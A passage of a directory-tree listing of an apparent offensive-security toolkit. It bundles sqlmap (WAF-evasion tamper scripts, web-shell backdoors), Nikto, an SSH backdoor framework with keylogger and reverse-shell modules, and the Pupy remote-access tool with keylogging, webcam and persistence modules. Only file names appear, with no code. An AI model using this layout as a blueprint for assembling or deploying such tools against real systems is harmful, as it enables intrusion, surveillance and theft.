│ │ ├── binarysec.py │ │ ├── blockdos.py │ │ ├── ciscoacexml.py │ │ ├── cloudflare.py │ │ ├── datapower.py │ │ ├── denyall.py │ │ ├── dotdefender.py │ │ ├── edgecast.py │ │ ├── expressionengine.py │ │ ├── fortiweb.py │ │ ├── hyperguard.py │ │ ├── incapsula.py │ │ ├── isaserver.py │ │ ├── jiasule.py │ │ ├── knownsec.py │ │ ├── kona.py │ │ ├── modsecurity.py │ │ ├── netcontinuum.py │ │ ├── netscaler.py │ │ ├── paloalto.py │ │ ├── profense.py │ │ ├── proventia.py │ │ ├── radware.py │ │ ├── requestvalidationmode.py │ │ ├── safedog.py │ │ ├── secureiis.py │ │ ├── senginx.py │ │ ├── sucuri.py │ │ ├── teros.py │ │ ├── trafficshield.py │ │ ├── urlscan.py │ │ ├── uspses.py │ │ ├── varnish.py │ │ ├── webappsecure.py │ │ └── webknight.py │ └── xml │ │ ├── banner │ │ ├── cookie.xml │ │ ├── generic.xml │ │ ├── mssql.xml │ │ ├── mysql.xml │ │ ├── oracle.xml │ │ ├── postgresql.xml │ │ ├── server.xml │ │ ├── servlet.xml │ │ ├── sharepoint.xml │ │ ├── x-aspnet-version.xml │ │ └── x-powered-by.xml │ │ ├── boundaries.xml │ │ ├── errors.xml │ │ ├── livetests.xml │ │ ├── payloads │ │ ├── 01_boolean_blind.xml │ │ ├── 02_error_based.xml │ │ ├── 03_inline_query.xml │ │ ├── 04_stacked_queries.xml │ │ ├── 05_time_blind.xml │ │ └── 06_union_query.xml │ │ ├── queries.xml │ │ └── sqlmap.xsd │ ├── sqli │ ├── .gitattributes │ ├── .gitignore │ ├── CONTRIBUTING.md │ ├── README.md │ ├── doc │ │ ├── AUTHORS │ │ ├── CHANGELOG.md │ │ ├── COPYING │ │ ├── FAQ.pdf │ │ ├── README.pdf │ │ ├── THANKS.md │ │ ├── THIRD-PARTY.md │ │ └── translations │ │ │ ├── README-gr-GR.md │ │ │ ├── README-hr-HR.md │ │ │ ├── README-id-ID.md │ │ │ ├── README-pt-BR.md │ │ │ └── README-zh-CN.md │ ├── extra │ │ ├── __init__.py │ │ ├── beep │ │ │ ├── __init__.py │ │ │ ├── beep.py │ │ │ └── beep.wav │ │ ├── cloak │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ └── cloak.py │ │ ├── dbgtool │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ └── dbgtool.py │ │ ├── icmpsh │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ ├── icmpsh-m.c │ │ │ ├── icmpsh-m.pl │ │ │ ├── icmpsh-s.c │ │ │ ├── icmpsh.exe_ │ │ │ └── icmpsh_m.py │ │ ├── mssqlsig │ │ │ └── update.py │ │ ├── runcmd │ │ │ ├── README.txt │ │ │ └── windows │ │ │ │ ├── README.txt │ │ │ │ ├── runcmd.sln │ │ │ │ └── runcmd │ │ │ │ ├── runcmd.cpp │ │ │ │ ├── runcmd.vcproj │ │ │ │ ├── stdafx.cpp │ │ │ │ └── stdafx.h │ │ ├── safe2bin │ │ │ ├── README.txt │ │ │ ├── __init__.py │ │ │ └── safe2bin.py │ │ ├── shellcodeexec │ │ │ ├── README.txt │ │ │ ├── linux │ │ │ │ ├── shellcodeexec.x32_ │ │ │ │ └── shellcodeexec.x64_ │ │ │ └── windows │ │ │ │ └── shellcodeexec.x32.exe_ │ │ ├── shutils │ │ │ ├── blanks.sh │ │ │ ├── duplicates.py │ │ │ ├── pep8.sh │ │ │ ├── pyflakes.sh │ │ │ ├── pylint.py │ │ │ └── regressiontest.py │ │ └── sqlharvest │ │ │ ├── __init__.py │ │ │ └── sqlharvest.py │ ├── plugins │ │ ├── __init__.py │ │ ├── dbms │ │ │ ├── __init__.py │ │ │ ├── access │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── db2 │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── firebird │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── hsqldb │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── maxdb │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── mssqlserver │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── mysql │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── oracle │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── postgresql │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ ├── sqlite │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ │ └── sybase │ │ │ │ ├── __init__.py │ │ │ │ ├── connector.py │ │ │ │ ├── enumeration.py │ │ │ │ ├── filesystem.py │ │ │ │ ├── fingerprint.py │ │ │ │ ├── syntax.py │ │ │ │ └── takeover.py │ │ └── generic │ │ │ ├── __init__.py │ │ │ ├── connector.py │ │ │ ├── custom.py │ │ │ ├── databases.py │ │ │ ├── entries.py │ │ │ ├── enumeration.py │ │ │ ├── filesystem.py │ │ │ ├── fingerprint.py │ │ │ ├── misc.py │ │ │ ├── search.py │ │ │ ├── syntax.py │ │ │ ├── takeover.py │ │ │ └── users.py │ ├── procs │ │ ├── README.txt │ │ ├── mssqlserver │ │ │ ├── activate_sp_oacreate.sql │ │ │ ├── configure_openrowset.sql │ │ │ ├── configure_xp_cmdshell.sql │ │ │ ├── create_new_xp_cmdshell.sql │ │ │ ├── disable_xp_cmdshell_2000.sql │ │ │ ├── dns_request.sql │ │ │ ├── enable_xp_cmdshell_2000.sql │ │ │ └── run_statement_as_user.sql │ │ ├── mysql │ │ │ ├── dns_request.sql │ │ │ └── write_file_limit.sql │ │ ├── oracle │ │ │ └── dns_request.sql │ │ └── postgresql │ │ │ └── dns_request.sql │ ├── shell │ │ ├── README.txt │ │ ├── backdoor.asp_ │ │ ├── backdoor.aspx_ │ │ ├── backdoor.jsp_ │ │ ├── backdoor.php_ │ │ ├── runcmd.exe_ │ │ ├── stager.asp_ │ │ ├── stager.aspx_ │ │ ├── stager.jsp_ │ │ └── stager.php_ │ ├── sqlmap.conf │ ├── sqlmap.py │ ├── sqlmapapi.py │ ├── tamper │ │ ├── __init__.py │ │ ├── apostrophemask.py │ │ ├── apostrophenullencode.py │ │ ├── appendnullbyte.py │ │ ├── base64encode.py │ │ ├── between.py │ │ ├── bluecoat.py │ │ ├── chardoubleencode.py │ │ ├── charencode.py │ │ ├── charunicodeencode.py │ │ ├── concat2concatws.py │ │ ├── equaltolike.py │ │ ├── greatest.py │ │ ├── halfversionedmorekeywords.py │ │ ├── ifnull2ifisnull.py │ │ ├── informationschemacomment.py │ │ ├── lowercase.py │ │ ├── modsecurityversioned.py │ │ ├── modsecurityzeroversioned.py │ │ ├── multiplespaces.py │ │ ├── nonrecursivereplacement.py │ │ ├── overlongutf8.py │ │ ├── percentage.py │ │ ├── randomcase.py │ │ ├── randomcomments.py │ │ ├── securesphere.py │ │ ├── sp_password.py │ │ ├── space2comment.py │ │ ├── space2dash.py │ │ ├── space2hash.py │ │ ├── space2morehash.py │ │ ├── space2mssqlblank.py │ │ ├── space2mssqlhash.py │ │ ├── space2mysqlblank.py │ │ ├── space2mysqldash.py │ │ ├── space2plus.py │ │ ├── space2randomblank.py │ │ ├── symboliclogical.py │ │ ├── unionalltounion.py │ │ ├── unmagicquotes.py │ │ ├── uppercase.py │ │ ├── varnish.py │ │ ├── versionedkeywords.py │ │ ├── versionedmorekeywords.py │ │ └── xforwardedfor.py │ ├── thirdparty │ │ ├── ansistrm │ │ │ └── ansistrm.py │ │ ├── beautifulsoup │ │ │ ├── __init__.py │ │ │ └── beautifulsoup.py │ │ ├── bottle │ │ │ ├── __init__.py │ │ │ └── bottle.py │ │ ├── chardet │ │ │ ├── __init__.py │ │ │ ├── big5freq.py │ │ │ ├── big5prober.py │ │ │ ├── chardistribution.py │ │ │ ├── charsetgroupprober.py │ │ │ ├── charsetprober.py │ │ │ ├── codingstatemachine.py │ │ │ ├── constants.py │ │ │ ├── escprober.py │ │ │ ├── escsm.py │ │ │ ├── eucjpprober.py │ │ │ ├── euckrfreq.py │ │ │ ├── euckrprober.py │ │ │ ├── euctwfreq.py │ │ │ ├── euctwprober.py │ │ │ ├── gb2312freq.py │ │ │ ├── gb2312prober.py │ │ │ ├── hebrewprober.py │ │ │ ├── jisfreq.py │ │ │ ├── jpcntx.py │ │ │ ├── langbulgarianmodel.py │ │ │ ├── langcyrillicmodel.py │ │ │ ├── langgreekmodel.py │ │ │ ├── langhebrewmodel.py │ │ │ ├── langhungarianmodel.py │ │ │ ├── langthaimodel.py │ │ │ ├── latin1prober.py │ │ │ ├── mbcharsetprober.py │ │ │ ├── mbcsgroupprober.py │ │ │ ├── mbcssm.py │ │ │ ├── sbcharsetprober.py │ │ │ ├── sbcsgroupprober.py │ │ │ ├── sjisprober.py │ │ │ ├── test.py │ │ │ ├── universaldetector.py │ │ │ └── utf8prober.py │ │ ├── clientform │ │ │ ├── __init__.py │ │ │ └── clientform.py │ │ ├── colorama │ │ │ ├── ansi.py │ │ │ ├── ansitowin32.py │ │ │ ├── initialise.py │ │ │ ├── win32.py │ │ │ └── winterm.py │ │ ├── fcrypt │ │ │ ├── __init__.py │ │ │ └── fcrypt.py │ │ ├── gprof2dot │ │ │ ├── __init__.py │ │ │ └── gprof2dot.py │ │ ├── keepalive │ │ │ ├── __init__.py │ │ │ └── keepalive.py │ │ ├── magic │ │ │ └── magic.py │ │ ├── multipart │ │ │ └── multipartpost.py │ │ ├── odict │ │ │ ├── __init__.py │ │ │ └── odict.py │ │ ├── oset │ │ │ ├── LICENSE.txt │ │ │ ├── __init__.py │ │ │ ├── _abc.py │ │ │ └── pyoset.py │ │ ├── pagerank │ │ │ ├── __init__.py │ │ │ └── pagerank.py │ │ ├── prettyprint │ │ │ ├── __init__.py │ │ │ └── prettyprint.py │ │ ├── pydes │ │ │ ├── __init__.py │ │ │ └── pyDes.py │ │ ├── socks │ │ │ ├── LICENSE │ │ │ └── socks.py │ │ ├── termcolor │ │ │ └── termcolor.py │ │ └── xdot │ │ │ ├── __init__.py │ │ │ └── xdot.py │ ├── txt │ │ ├── common-columns.txt │ │ ├── common-outputs.txt │ │ ├── common-tables.txt │ │ ├── keywords.txt │ │ ├── smalldict.txt │ │ ├── user-agents.txt │ │ └── wordlist.zip │ ├── udf │ │ ├── README.txt │ │ ├── mysql │ │ │ ├── linux │ │ │ │ ├── 32 │ │ │ │ │ └── lib_mysqludf_sys.so_ │ │ │ │ └── 64 │ │ │ │ │ └── lib_mysqludf_sys.so_ │ │ │ └── windows │ │ │ │ ├── 32 │ │ │ │ └── lib_mysqludf_sys.dll_ │ │ │ │ └── 64 │ │ │ │ └── lib_mysqludf_sys.dll_ │ │ └── postgresql │ │ │ ├── linux │ │ │ ├── 32 │ │ │ │ ├── 8.2 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.3 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.4 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.0 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.1 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.2 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.3 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ └── 9.4 │ │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ └── 64 │ │ │ │ ├── 8.2 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.3 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 8.4 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.0 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.1 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.2 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ ├── 9.3 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ │ └── 9.4 │ │ │ │ └── lib_postgresqludf_sys.so_ │ │ │ └── windows │ │ │ └── 32 │ │ │ ├── 8.2 │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ ├── 8.3 │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ ├── 8.4 │ │ │ └── lib_postgresqludf_sys.dll_ │ │ │ └── 9.0 │ │ │ └── lib_postgresqludf_sys.dll_ │ ├── waf │ │ ├── 360.py │ │ ├── __init__.py │ │ ├── airlock.py │ │ ├── anquanbao.py │ │ ├── baidu.py │ │ ├── barracuda.py │ │ ├── bigip.py │ │ ├── binarysec.py │ │ ├── blockdos.py │ │ ├── ciscoacexml.py │ │ ├── cloudflare.py │ │ ├── datapower.py │ │ ├── denyall.py │ │ ├── dotdefender.py │ │ ├── edgecast.py │ │ ├── expressionengine.py │ │ ├── fortiweb.py │ │ ├── hyperguard.py │ │ ├── incapsula.py │ │ ├── isaserver.py │ │ ├── jiasule.py │ │ ├── knownsec.py │ │ ├── kona.py │ │ ├── modsecurity.py │ │ ├── netcontinuum.py │ │ ├── netscaler.py │ │ ├── paloalto.py │ │ ├── profense.py │ │ ├── proventia.py │ │ ├── radware.py │ │ ├── requestvalidationmode.py │ │ ├── safedog.py │ │ ├── secureiis.py │ │ ├── senginx.py │ │ ├── sucuri.py │ │ ├── teros.py │ │ ├── trafficshield.py │ │ ├── urlscan.py │ │ ├── uspses.py │ │ ├── varnish.py │ │ ├── webappsecure.py │ │ └── webknight.py │ └── xml │ │ ├── banner │ │ ├── cookie.xml │ │ ├── generic.xml │ │ ├── mssql.xml │ │ ├── mysql.xml │ │ ├── oracle.xml │ │ ├── postgresql.xml │ │ ├── server.xml │ │ ├── servlet.xml │ │ ├── sharepoint.xml │ │ ├── x-aspnet-version.xml │ │ └── x-powered-by.xml │ │ ├── boundaries.xml │ │ ├── errors.xml │ │ ├── livetests.xml │ │ ├── payloads │ │ ├── 01_boolean_blind.xml │ │ ├── 02_error_based.xml │ │ ├── 03_inline_query.xml │ │ ├── 04_stacked_queries.xml │ │ ├── 05_time_blind.xml │ │ └── 06_union_query.xml │ │ ├── queries.xml │ │ └── sqlmap.xsd │ └── vscan │ ├── databases │ ├── db_404_strings │ ├── db_content_search │ ├── db_dictionary │ ├── db_drupal │ ├── db_embedded │ ├── db_favicon │ ├── db_headers │ ├── db_httpoptions │ ├── db_multiple_index │ ├── db_outdated │ ├── db_parked_strings │ ├── db_realms │ ├── db_server_msgs │ ├── db_subdomains │ ├── db_tests │ └── db_variables │ ├── docs │ ├── CHANGES.txt │ ├── LICENSE.txt │ ├── manual.xml │ ├── nikto.1 │ ├── nikto.dtd │ └── nikto_manual.html │ ├── nikto.conf │ ├── nikto.pl │ ├── plugins │ ├── LW2.pm │ ├── nikto_apache_expect_xss.plugin │ ├── nikto_apacheusers.plugin │ ├── nikto_auth.plugin │ ├── nikto_cgi.plugin │ ├── nikto_clientaccesspolicy.plugin │ ├── nikto_content_search.plugin │ ├── nikto_cookies.plugin │ ├── nikto_core.plugin │ ├── nikto_dictionary_attack.plugin │ ├── nikto_drupal.plugin │ ├── nikto_embedded.plugin │ ├── nikto_favicon.plugin │ ├── nikto_fileops.plugin │ ├── nikto_headers.plugin │ ├── nikto_httpoptions.plugin │ ├── nikto_ms10_070.plugin │ ├── nikto_msgs.plugin │ ├── nikto_multiple_index.plugin │ ├── nikto_negotiate.plugin │ ├── nikto_outdated.plugin │ ├── nikto_parked.plugin │ ├── nikto_paths.plugin │ ├── nikto_put_del_test.plugin │ ├── nikto_report_csv.plugin │ ├── nikto_report_html.plugin │ ├── nikto_report_nbe.plugin │ ├── nikto_report_sqlg.plugin │ ├── nikto_report_text.plugin │ ├── nikto_report_xml.plugin │ ├── nikto_robots.plugin │ ├── nikto_shellshock.plugin │ ├── nikto_siebel.plugin │ ├── nikto_sitefiles.plugin │ ├── nikto_ssl.plugin │ ├── nikto_subdomain.plugin │ └── nikto_tests.plugin │ ├── replay.pl │ └── templates │ ├── htm_close.tmpl │ ├── htm_end.tmpl │ ├── htm_host_head.tmpl │ ├── htm_host_im.tmpl │ ├── htm_host_item.tmpl │ ├── htm_start.tmpl │ ├── htm_stop.tmpl │ ├── htm_summary.tmpl │ ├── xml_close.tmpl │ ├── xml_end.tmpl │ ├── xml_host_head.tmpl │ ├── xml_host_im.tmpl │ ├── xml_host_item.tmpl │ └── xml_start.tmpl ├── NoobSecToolkit ├── NSToolkit.py ├── scripts │ ├── .DS_Store │ ├── Hash_ID.py │ ├── NumberConverter.py │ ├── OSCAR │ │ ├── .gitignore │ │ ├── DEPENDENCY_CHECK.py │ │ ├── OSCARf.py │ │ ├── config │ │ │ ├── ports.txt │ │ │ ├── rssfeeds.dat │ │ │ ├── rssfilter.dat │ │ │ └── webscrape.dat │ │ ├── pastebin │ │ │ ├── downloaded │ │ │ │ └── test.test │ │ │ └── test.test │ │ ├── plugins │ │ │ ├── __init__.py │ │ │ ├── asciis.py │ │ │ ├── domainip.py │ │ │ ├── fblookup.py │ │ │ ├── instag.py │ │ │ ├── ipinfo.py │ │ │ ├── linked.py │ │ │ ├── newsfeed.py │ │ │ ├── oscrtwitter.py │ │ │ ├── oshodan.py │ │ │ ├── portlook.py │ │ │ ├── pyscrape.py │ │ │ ├── sslscan.py │ │ │ └── webscrape.py │ │ ├── requirements.txt │ │ ├── rss │ │ │ ├── feeds.dat │ │ │ ├── filter.dat │ │ │ └── news │ │ │ │ └── test.test │ │ └── setup │ │ │ ├── DEPENDENCY_CHECK.py │ │ │ ├── README.md │ │ │ ├── requirements.txt │ │ │ └── setup.py │ ├── decode.py │ ├── dns.py │ ├── dping.py │ ├── finder.pl │ ├── hex_converter.py │ ├── hw5.py │ ├── macspoof.py │ ├── mir.py │ ├── nextpenbox.py │ ├── pySteg │ │ └── pysteg.py │ ├── sqli.py │ ├── sshbackdoors │ │ ├── .gitignore │ │ ├── .travis.yml │ │ ├── README.md │ │ ├── backdoors │ │ │ ├── __init__.py │ │ │ ├── access │ │ │ │ ├── remove_ssh.py │ │ │ │ ├── ssh_key.py │ │ │ │ └── ssh_port.py │ │ │ ├── auxiliary │ │ │ │ ├── append.py │ │ │ │ ├── immutable.py │ │ │ │ ├── keylogger.py │ │ │ │ ├── option.py │ │ │ │ ├── simplehttp.py │ │ │ │ ├── user.py │ │ │ │ ├── web.py │ │ │ │ └── web │ │ │ │ │ └── install.sh │ │ │ ├── backdoor.py │ │ │ ├── escalation │ │ │ │ ├── setuid.py │ │ │ │ └── shell.py │ │ │ ├── option.py │ │ │ ├── shell │ │ │ │ ├── bash.py │ │ │ │ ├── bash2.py │ │ │ │ ├── metasploit.py │ │ │ │ ├── netcat.py │ │ │ │ ├── netcat_traditional.py │ │ │ │ ├── perl.py │ │ │ │ ├── perl │ │ │ │ │ ├── a.out │ │ │ │ │ ├── prs.pl │ │ │ │ │ ├── prs.pl~ │ │ │ │ │ ├── prs1 │ │ │ │ │ ├── prs2 │ │ │ │ │ └── prsA.pl │ │ │ │ ├── php.py │ │ │ │ ├── pupy.py │ │ │ │ ├── pupy │ │ │ │ │ ├── .gitignore │ │ │ │ │ ├── LICENSE │ │ │ │ │ ├── README.md │ │ │ │ │ ├── client │ │ │ │ │ │ ├── additional_imports.py │ │ │ │ │ │ ├── build_library_helper.py │ │ │ │ │ │ ├── reverse_ssl.py │ │ │ │ │ │ └── sources │ │ │ │ │ │ │ ├── GetProcAddressR.c │ │ │ │ │ │ │ ├── GetProcAddressR.h │ │ │ │ │ │ │ ├── LICENSES.txt │ │ │ │ │ │ │ ├── LoadLibraryR.c │ │ │ │ │ │ │ ├── LoadLibraryR.h │ │ │ │ │ │ │ ├── Makefile │ │ │ │ │ │ │ ├── MemoryModule.c │ │ │ │ │ │ │ ├── MemoryModule.h │ │ │ │ │ │ │ ├── MyLoadLibrary.c │ │ │ │ │ │ │ ├── MyLoadLibrary.h │ │ │ │ │ │ │ ├── Python-dynload.c │ │ │ │ │ │ │ ├── Python-dynload.h │ │ │ │ │ │ │ ├── Python-version.h │ │ │ │ │ │ │ ├── ReflectiveDllInjection.h │ │ │ │ │ │ │ ├── ReflectiveLoader.c │ │ │ │ │ │ │ ├── ReflectiveLoader.h │ │ │ │ │ │ │ ├── _memimporter.c │ │ │ │ │ │ │ ├── actctx.c │ │ │ │ │ │ │ ├── actctx.h │ │ │ │ │ │ │ ├── base_dispatch.c │ │ │ │ │ │ │ ├── base_inject.c │ │ │ │ │ │ │ ├── base_inject.h │ │ │ │ │ │ │ ├── gen_library_compressed_string.py │ │ │ │ │ │ │ ├── gen_python_bootloader.py │ │ │ │ │ │ │ ├── gen_resource_header.py │ │ │ │ │ │ │ ├── import-tab.c │ │ │ │ │ │ │ ├── import-tab.h │ │ │ │ │ │ │ ├── list.c │ │ │ │ │ │ │ ├── list.h │ │ │ │ │ │ │ ├── main_exe.c │ │ │ │ │ │ │ ├── main_reflective.c │ │ │ │ │ │ │ ├── makex64.bat │ │ │ │ │ │ │ ├── makex86.bat │ │ │ │ │ │ │ ├── mktab.py │ │ │ │ │ │ │ ├── pupy.c │ │ │ │ │ │ │ ├── pupy_load.c │ │ │ │ │ │ │ ├── pupy_load.h │ │ │ │ │ │ │ ├── remote_thread.c │ │ │ │ │ │ │ ├── remote_thread.h │ │ │ │ │ │ │ ├── resource_python_manifest.c │ │ │ │ │ │ │ ├── resources │ │ │ │ │ │ │ ├── iter_files.py │ │ │ │ │ │ │ └── library_patches │ │ │ │ │ │ │ │ └── uuid.py │ │ │ │ │ │ │ ├── thread.c │ │ │ │ │ │ │ └── thread.h │ │ │ │ │ └── pupy │ │ │ │ │ │ ├── crypto │ │ │ │ │ │ ├── cert.pem │ │ │ │ │ │ ├── gen.sh │ │ │ │ │ │ └── server.pem │ │ │ │ │ │ ├── modules │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── download.py │ │ │ │ │ │ ├── exit.py │ │ │ │ │ │ ├── get_info.py │ │ │ │ │ │ ├── getprivs.py │ │ │ │ │ │ ├── interactive_shell.py │ │ │ │ │ │ ├── keylogger.py │ │ │ │ │ │ ├── memory_exec.py │ │ │ │ │ │ ├── migrate.py │ │ │ │ │ │ ├── mouselogger.py │ │ │ │ │ │ ├── msgbox.py │ │ │ │ │ │ ├── persistence.py │ │ │ │ │ │ ├── portfwd.py │ │ │ │ │ │ ├── process_kill.py │ │ │ │ │ │ ├── ps.py │ │ │ │ │ │ ├── pyexec.py │ │ │ │ │ │ ├── pyshell.py │ │ │ │ │ │ ├── screenshot.py │ │ │ │ │ │ ├── search.py │ │ │ │ │ │ ├── shell_exec.py │ │ │ │ │ │ ├── shellcode_exec.py │ │ │ │ │ │ ├── socks5proxy.py │ │ │ │ │ │ ├── upload.py │ │ │ │ │ │ └── webcamsnap.py │ │ │ │ │ │ ├── packages │ │ │ │ │ │ ├── all │ │ │ │ │ │ │ ├── interactive_shell.py │ │ │ │ │ │ │ ├── pupyimporter.py │ │ │ │ │ │ │ └── pupyutils │ │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ │ └── search.py │ │ │ │ │ │ ├── src │ │ │ │ │ │ │ ├── VideoCapture │ │ │ │ │ │ │ │ ├── LGPL.txt │ │ │ │ │ │ │ │ └── src │ │ │ │ │ │ │ │ │ ├── VideoCapture.py │ │ │ │ │ │ │ │ │ ├── fixhtml.py │ │ │ │ │ │ │ │ │ ├── helvB08.pil │ │ │ │ │ │ │ │ │ ├── helvB08.png │ │ │ │ │ │ │ │ │ ├── helvetica-10.pil │ │ │ │ │ │ │ │ │ ├── helvetica-10.png │ │ │ │ │ │ │ │ │ ├── mkdist.py │ │ │ │ │ │ │ │ │ ├── vidcap.dsp │ │ │ │ │ │ │ │ │ ├── vidcap.dsw │ │ │ │ │ │ │ │ │ └── vidcapmodule.cpp │ │ │ │ │ │ │ └── pupymemexec │ │ │ │ │ │ │ │ ├── in-mem-exe.c │ │ │ │ │ │ │ │ ├── make.bat │ │ │ │ │ │ │ │ ├── makex64.bat │ │ │ │ │ │ │ │ └── pupymemexec.c │ │ │ │ │ │ └── windows │ │ │ │ │ │ │ ├── all │ │ │ │ │ │ │ └── pupwinutils │ │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ │ ├── keylogger.py │ │ │ │ │ │ │ │ ├── memexec.py │ │ │ │ │ │ │ │ ├── mouselogger.py │ │ │ │ │ │ │ │ ├── msgbox.py │ │ │ │ │ │ │ │ ├── persistence.py │ │ │ │ │ │ │ │ ├── processes.py │ │ │ │ │ │ │ │ ├── screenshot.py │ │ │ │ │ │ │ │ ├── security.py │ │ │ │ │ │ │ │ └── shellcode.py │ │ │ │ │ │ │ ├── amd64 │ │ │ │ │ │ │ ├── psutil │ │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ │ ├── _common.py │ │ │ │ │ │ │ │ ├── _compat.py │ │ │ │ │ │ │ │ ├── _psbsd.py │ │ │ │ │ │ │ │ ├── _pslinux.py │ │ │ │ │ │ │ │ ├── _psosx.py │ │ │ │ │ │ │ │ ├── _psposix.py │ │ │ │ │ │ │ │ ├── _pssunos.py │ │ │ │ │ │ │ │ ├── _psutil_windows.pyd │ │ │ │ │ │ │ │ └── _pswindows.py │ │ │ │ │ │ │ ├── pupymemexec.pyd │ │ │ │ │ │ │ └── vidcap.pyd │ │ │ │ │ │ │ └── x86 │ │ │ │ │ │ │ ├── psutil │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── _common.py │ │ │ │ │ │ │ ├── _compat.py │ │ │ │ │ │ │ ├── _psbsd.py │ │ │ │ │ │ │ ├── _pslinux.py │ │ │ │ │ │ │ ├── _psosx.py │ │ │ │ │ │ │ ├── _psposix.py │ │ │ │ │ │ │ ├── _pssunos.py │ │ │ │ │ │ │ ├── _psutil_windows.pyd │ │ │ │ │ │ │ └── _pswindows.py │ │ │ │ │ │ │ ├── pupymemexec.pyd │ │ │ │ │ │ │ └── vidcap.pyd │ │ │ │ │ │ ├── pupy.conf │ │ │ │ │ │ ├── pupygen.py │ │ │ │ │ │ ├── pupylib │ │ │ │ │ │ ├── PupyClient.py │ │ │ │ │ │ ├── PupyCmd.py │ │ │ │ │ │ ├── PupyCompleter.py │ │ │ │ │ │ ├── PupyErrors.py │ │ │ │ │ │ ├── PupyJob.py │ │ │ │ │ │ ├── PupyModule.py │ │ │ │ │ │ ├── PupyServer.py │ │ │ │ │ │ ├── PupyService.py │ │ │ │ │ │ ├── PythonCompleter.py │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── utils │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ ├── network.py │ │ │ │ │ │ │ ├── pe.py │ │ │ │ │ │ │ └── rpyc_utils.py │ │ │ │ │ │ └── pupysh.py │ │ │ │ ├── pyth.py │ │ │ │ ├── pythScript │ │ │ │ │ ├── pythBackdoor.py │ │ │ │ │ ├── pythPart1 │ │ │ │ │ └── pythPart2 │ │ │ │ └── web.py │ │ │ ├── template.py │ │ │ └── windows │ │ │ │ └── windows.py │ │ ├── definitions.py │ │ ├── dependencies.py │ │ ├── imports.py │ │ ├── master.py │ │ ├── modules │ │ │ ├── __init__.py │ │ │ ├── addUser.py │ │ │ ├── cron.py │ │ │ ├── module.py │ │ │ ├── option.py │ │ │ ├── poison.py │ │ │ ├── startup.py │ │ │ ├── template.py │ │ │ ├── web │ │ │ │ ├── env1 │ │ │ │ ├── env2 │ │ │ │ ├── envvars │ │ │ │ └── install.sh │ │ │ ├── webMod.py │ │ │ └── whitelist.py │ │ ├── requirements.txt │ │ ├── rpyc │ │ │ ├── __init__.py │ │ │ ├── core │ │ │ │ ├── __init__.py │ │ │ │ ├── async.py │ │ │ │ ├── brine.py │ │ │ │ ├── channel.py │ │ │ │ ├── consts.py │ │ │ │ ├── netref.py │ │ │ │ ├── 